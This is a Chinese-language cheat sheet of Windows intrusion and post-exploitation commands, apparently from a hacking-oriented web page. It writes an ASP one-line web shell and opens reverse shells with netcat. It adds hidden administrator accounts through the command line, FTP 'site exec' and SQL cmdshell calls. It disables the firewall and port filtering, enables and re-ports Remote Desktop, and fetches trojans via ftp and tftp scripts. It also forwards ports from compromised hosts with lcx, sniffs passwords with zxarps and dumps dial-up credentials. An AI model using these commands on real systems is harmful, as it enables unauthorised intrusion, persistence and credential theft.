windows下面常用的渗透测试命令
![]() | ![]() | |
![]() | echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp Md hack 创建hack文件夹 本地nc -vv -p -l 端口 服务器 nc路径 -e cmd路径 ip 端口
Rd hack 删除hack文件夹 Type d:\wwwroot\hack.asp 查看一句话木马的内容 Del d:\wwwroot\hack.asp 删除hack.asp Dir c:\ 查看c盘根目录全部文件夹和文件信息 Tree e:\ 显示e盘文件目录树 reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber 查看终端确定为3389? HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的键值是多少?值为0是开,为1是关 netstat -ano 能看到3389开启? net stop policyagent net stop sharedaccess /c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s
先net stop sharedacess关闭防火,再net stop PolicyAgent关闭筛选
administrator默认被允许,这种情况下,你需将用户同时加入“Remote Desktop Users”组。 net user xxx pppp /add ;net localgroup administrators xxx /add net localgroup administrators xxx /add net localgroup “Remote Desktop Users” xxx /add 远程桌面用户允许设置。
gpedit.msc
常用系统小命令 gpedit.msc计算机组策略 compmgmt.msc计算机管理 devmgmt.msc设备管理 diskmgmt.msc磁盘管理 fsmgmt.msc共享管理 lusrmgr.ms本地用户管理 notepad写字板write services.msc服务管理
开启 telnet @echo off sc config tlntsvr start= auto net start telnet
在CMD模式下结束某一进程 一: 通过tasklist 可以查找到相关进程的PID。 语法:tasklist /svc 通过taskkill pid 可以关掉进程。 语法: taskkill /im 进程名 /f 二: ntsd -c q -p PID 可以强行结束运行进程 zxarps.exe -idx 0 -ip 目标的IP -port 80,21,3389 -logfilter “+post,+user,+pass” dialupass /allusers /stext “c:\1.txt” ======================================================== query user 查询登陆用户 logoff ID 蹬出某用户 net user 查看所有用户 c:\xp3389.exe -a net user 1 1 /add net1 localgroup administrators 1 /add C:\>net1 user guest /active:yes 启用该用户 ========================================================= whoami 查看全系统权限 调系统权限 C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f ========================================================== FTP命令行下加账号的命令;很爽。。。 C:\>ftp ftp> open 192.168.0.22 ftp> quote site exec net.exe user admin$ jinwei58 /add ftp> quote site exec net.exe localgroup admin$ /add 200 EXEC command successful (TID=33). ============================================================ ftp传马命令 echo open 自己的FTP > cmd.txt echo 帐户>> cmd.txt echo 密码>> cmd.txt echo binary >> cmd.txt echo get 木马.exe >> cmd.txt echo bye >> cmd.txt ftp -s:cmd.txt 木马.exe 木马.exe del cmd.txt. /q ============================================================== quote site exec net user 用户名 密码 /add 添加用户 quote site exec net localgroup administrators 用户名 /add tasklist \svc //shell列进程 ============================================================== sql语句加管理用户 Select MyCmd(“net user”); select state(“net user”) select cmdshell(“net user”) ============================================================== netstat -an 1.查询终端开放端口 netstat -an | find “3389″ ================================================================ 查询终端3389端口 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber ================================================================ 2.开启2003终端 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f ================================================================ 3.更改终端端口为2008(0x7d8) REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f ================================================================= 4.取消xp;2003系统防火墙对终端服务的限制及IP连接的限制 REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f ================================================================= 5.开启Win2000的终端 (需重启) 先将开启终端的工具上传到目标主机的c:\ 然后执行c:\ver3389.exe等待系统重启就可以了 ===================================================================== 6.解决终端超出了最大连接数的命令 mstsc /v:ip:3389 /console ===================================================================== 关闭防火墙 net stop sharedaccess ====================================================================== 先将双开3389的工具上传到目标主机下的c:\ 然后运行命令 c:\3389.exe ====================================================================== Tasklist/SVC >>c:\3389.txt ===================================================================== 查看adsl Dialupass.exe /allusers /stext “c:\1.txt” ===================================================================== 端口映射篇之lcx使用方法 Lcx 命令 本机运行lcx.exe -listen 3001 3002
c:\lcx.exe -slave 61.184.188.125 3001 肉鸡的内网IP 3389 C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389 在本机连接: 127.0.0.1:3002 ===================================================================== 这里是nc的命令说明: 2.nc反弹提权: 服务器执行: nc位置 -l -p 8080 -t -e cmd位置 监听本地入栈信息 NC地址 cmd地址 ————————————————— -p port 打开本地端口 本地执行: telnet + 服务器IP地址 + 446 ————————————————— -t 以telnet形式应答入栈请求 传马命令: tftp -i ip地址 get 木马名字.exe -e 程序重定向
额外:传个NC到webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。 2.降低运行权限 //////////////////////////// 现在本地监听一个端口。 nc -vv -l -p 8080 最好是80或8080这样的端口,被防火墙拦截的几率小很多。 在WebShell运行下面命令连接我们监听的端口得到CmdShell: nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe —-=============================================================== 1.查询终端端口
xp;2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber
通用:regedit /e tsp.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp” type tsp.reg
2.开启XP;2003终端服务 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\ REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp;2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 >2000.reg echo. >>2000.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg echo “Enabled”=”0″ >>2000.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg echo “ShutdownWithoutLogon”=”0″ >>2000.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg echo “EnableAdminTSRemote”=dword:00000001 >>2000.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg echo “TSEnabled”=dword:00000001 >>2000.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg echo “Start”=dword:00000002 >>2000.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg echo “Start”=dword:00000002 >>2000.reg echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg echo “Hotkey”=”1″ >>2000.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg echo “PortNumber”=dword:00000D3D >>2000.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg echo “PortNumber”=dword:00000D3D >>2000.reg
6.强行重启Win2000;Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF ; cd/d %temp% ; echo [version] > restart.inf (set inf=InstallHinfSection DefaultInstall) echo signature=$chicago$ >> restart.inf echo [defaultinstall] >> restart.inf rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console
9.调整NTFS分区权限
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件) | |
![]() | ![]() |